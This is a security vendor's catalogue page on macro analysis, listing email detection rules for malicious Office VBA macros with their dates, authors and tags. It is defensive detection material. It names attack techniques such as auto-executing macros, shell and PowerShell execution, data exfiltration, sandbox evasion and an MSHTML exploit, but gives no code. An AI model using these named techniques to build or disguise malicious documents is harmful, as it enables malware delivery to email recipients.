• Macro analysis

Detection Method: Macro analysis

Macro analysis examines embedded code within documents, focusing primarily on Microsoft Office files that contain VBA (Visual Basic for Applications) macros. This technique goes beyond simply detecting macros—it analyzes how they behave, their intent, and whether they pose a potential security risk.
Macro analysis can help you detect:
  • Auto-executing macros that run as soon as documents are opened
  • Obfuscated or encoded commands that hide malicious actions
  • Suspicious API calls that access system resources or modify settings
  • Attempts to run commands through shell or PowerShell
  • Data exfiltration methods within macro code
For example, attackers might distribute seemingly legitimate Excel files with embedded macros that, when activated, download malware or establish persistence on your system.
Rule Name & Severity
Last Updated
Author
Types, Tactics & Capabilities
Suspicious VBA macros from untrusted sender
2d ago
Jul 16th, 2025 UTC
Sublime Security
Malware/Ransomware
Macros
File analysis
Macro analysis
Sender analysis
/feeds/core/detection-rules/suspicious-vba-macros-from-untrusted-sender-37cec120
Attachment with auto-executing macro (unsolicited)
2d ago
Jul 16th, 2025 UTC
Sublime Security
Malware/Ransomware
Macros
Archive analysis
Header analysis
File analysis
Macro analysis
OLE analysis
Sender analysis
/feeds/core/detection-rules/attachment-with-auto-executing-macro-unsolicited-af6624c3
Attachment with VBA macros from employee impersonation (unsolicited)
2d ago
Jul 16th, 2025 UTC
Sublime Security
Malware/Ransomware
Impersonation: Employee
Macros
Social engineering
Archive analysis
File analysis
Macro analysis
Sender analysis
/feeds/core/detection-rules/attachment-with-vba-macros-from-employee-impersonation-unsolicited-9b262123
Attachment with high risk VBA macro (unsolicited)
2d ago
Jul 16th, 2025 UTC
Sublime Security
Malware/Ransomware
Macros
File analysis
Macro analysis
OLE analysis
Sender analysis
/feeds/core/detection-rules/attachment-with-high-risk-vba-macro-unsolicited-a2b20e16
Attachment soliciting user to enable macros
2d ago
Jul 16th, 2025 UTC
Sublime Security
Malware/Ransomware
Macros
Archive analysis
File analysis
Macro analysis
Optical Character Recognition
Sender analysis
/feeds/core/detection-rules/attachment-soliciting-user-to-enable-macros-e9d75515
Attachment with auto-opening VBA macro (unsolicited)
2d ago
Jul 16th, 2025 UTC
Sublime Security
Malware/Ransomware
Macros
Archive analysis
File analysis
Macro analysis
Sender analysis
/feeds/core/detection-rules/attachment-with-auto-opening-vba-macro-unsolicited-d48b3e53
Attachment: Macro Files Containing MHT Content
1mo ago
Jun 12th, 2025 UTC
Sublime Security
Malware/Ransomware
Credential Phishing
Evasion
Macros
Scripting
Archive analysis
File analysis
Macro analysis
/feeds/core/detection-rules/attachment-macro-files-containing-mht-content-4d54e40b
Attachment: Archive contains DLL-loading macro
2y ago
Dec 28th, 2023 UTC
Sublime Security
Malware/Ransomware
Exploit
LNK
Macros
Scripting
Archive analysis
File analysis
Macro analysis
YARA
/feeds/core/detection-rules/attachment-archive-contains-dll-loading-macro-3a193f5f
Attachment: Potential Sandbox Evasion in Office File
2y ago
Dec 19th, 2023 UTC
@ajpc500
Malware/Ransomware
Evasion
Macros
File analysis
Macro analysis
/feeds/core/detection-rules/attachment-potential-sandbox-evasion-in-office-file-1c591681
Attachment: CVE-2021-40444 - MSHTML Remote Code Execution Vulnerability
2y ago
Dec 19th, 2023 UTC
Sublime Security
Malware/Ransomware
Exploit
Macros
Scripting
Archive analysis
Content analysis
File analysis
Macro analysis
OLE analysis
/feeds/core/detection-rules/attachment-cve-2021-40444-mshtml-remote-code-execution-vulnerability-8cefcf7f
Attachment: Macro with Suspected Use of COM ShellBrowserWindow Object for Process Creation
2y ago
Dec 19th, 2023 UTC
@ajpc500
Malware/Ransomware
Macros
Scripting
Content analysis
File analysis
Macro analysis
/feeds/core/detection-rules/attachment-macro-with-suspected-use-of-com-shellbrowserwindow-object-for-process-creation-527fc7f0